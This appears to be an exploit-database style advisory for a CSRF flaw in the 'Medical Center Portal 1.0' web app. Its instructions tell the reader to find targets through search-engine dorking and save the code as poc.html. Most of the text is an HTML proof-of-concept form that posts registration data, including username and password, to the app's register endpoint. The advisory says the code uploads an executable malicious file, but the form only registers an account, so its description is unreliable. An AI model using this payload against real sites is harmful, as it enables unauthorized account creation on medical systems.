=============================================================================================================================================
| # Title : Medical Center Portal 1.0 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/medic.zip |
=============================================================================================================================================
poc :
[+] Dorking Ä°n Google Or Other Search Enggine.
[+] The following html code uploads a executable malicious file remotely .
[+] Go to the line 52.
[+] Set the target site link Save changes and apply .
[+] save code as poc.html .
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Registration Form</title>
<style>
body {
font-family: Arial, sans-serif;
margin: 20px;
padding: 20px;
max-width: 600px;
background-color: #f4f4f4;
border-radius: 8px;
}
.form-container {
display: flex;
flex-direction: column;
}
.form-group {
margin-bottom: 15px;
}
.form-group label {
font-weight: bold;
margin-bottom: 5px;
display: block;
}
.form-group input, .form-group select {
padding: 8px;
width: 100%;
border: 1px solid #ccc;
border-radius: 4px;
}
.form-group select {
cursor: pointer;
}
.form-group button {
padding: 10px 15px;
background-color: #007bff;
color: white;
border: none;
cursor: pointer;
border-radius: 4px;
}
.form-group button:hover {
background-color: #0056b3;
}
</style>
</head>
<body>
<h2>Registration Form</h2>
<form action="http://127.0.0.1/medic/pages/register.php?action=add" method="POST" class="form-container">
<div class="form-group">
<label for="firstname">First Name:</label>
<input type="text" id="firstname" name="firstname" required>
</div>
<div class="form-group">
<label for="nid">National ID (NID):</label>
<input type="text" id="nid" name="nid" required>
</div>
<div class="form-group">
<label for="gender">Gender:</label>
<select id="gender" name="gender" required>
<option value="">Select Gender</option>
<option value="male">Male</option>
<option value="female">Female</option>
</select>
</div>
<div class="form-group">
<label for="email">Email:</label>
<input type="email" id="email" name="email" required>
</div>
<div class="form-group">
<label for="phonenumber">Phone Number:</label>
<input type="text" id="phonenumber" name="phonenumber" required>
</div>
<div class="form-group">
<label for="jobs">Job:</label>
<select id="jobs" name="jobs" required>
<option value="">Select Job</option>
<option value="doctor">Doctor</option>
<option value="nurse">Nurse</option>
<option value="pharmacist">Pharmacist</option>
</select>
</div>
<div class="form-group">
<label for="province">Province:</label>
<select id="province" name="province" required>
<option value="">Select Province</option>
<option value="province1">Province 1</option>
<option value="province2">Province 2</option>
<option value="province3">Province 3</option>
</select>
</div>
<div class="form-group">
<label for="city">City:</label>
<select id="city" name="city" required>
<option value="">Select City</option>
<option value="city1">City 1</option>
<option value="city2">City 2</option>
<option value="city3">City 3</option>
</select>
</div>
<div class="form-group">
<label for="username">Username:</label>
<input type="text" id="username" name="username" required>
</div>
<div class="form-group">
<label for="password">Password:</label>
<input type="password" id="password" name="password" required>
</div>
<div class="form-group">
<button type="submit">Register</button>
</div>
</form>
</body>
</html>
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================